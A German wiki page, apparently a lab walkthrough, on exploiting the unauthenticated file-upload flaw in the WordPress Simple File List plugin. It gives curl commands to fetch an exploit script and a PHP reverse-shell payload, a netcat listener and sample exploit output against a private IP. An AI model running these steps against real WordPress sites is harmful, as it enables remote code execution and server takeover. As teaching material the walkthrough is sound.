Unauthenticated Arbitrary File Upload
Version vom 19. Oktober 2022, 18:54 Uhr von Thomas.will (Diskussion | Beiträge) (→Python3 Script zum Payload Hochladen)
Arbitrary file upload in Simple File List plugin for WordPress
Schachstelle
- Die Schwachstelle besteht aufgrund einer unzureichenden Validierung von Dateien während des Datei-Uploads.
- Ein entfernter Angreifer kann eine Datei hochladen, die PHP-Code enthält, aber eine png-Bilddateierweiterung hat.
- Dannach wird eine zweite Anfrage gesendet, um die png-Datei in eine PHP-Datei zu verschieben.
- Im Anschluss wird die PHP-Datei aufgerufen und ausgeführt.
Ablauf
![Bearbeiten](javascript:editDrawio("1890559797", "arbitrary.drawio.png", "png", false, false, false, true, "https://embed.diagrams.net")){kind=link}
Python3 Script zum Payload Hochladen
- Das Skript kann unverändert übernommen werden.
- Python3 Script
- curl https://xinux.net/images/d/db/Script.py -o script.py
- chmod +x script.py
PHP Reverse Shell
- Die IP und eventuell der Port müssen angepasst werden.
- payload.txt
- curl https://xinux.net/images/d/d6/Payload.txt -o payload.txt
Angreifer
- netcat -lp 9999
Usage
- python3 script.py http://10.0.10.109
[ ] File 2243.png generated with password: 7faaeb2f6083b6601c4843f47419783a [ ] File uploaded at http://10.0.10.109/wp-content/uploads/simple-file-list/2243.png [ ] File moved to http://10.0.10.109/wp-content/uploads/simple-file-list/2243.php [+] Exploit seem to work. [*] Confirmning ..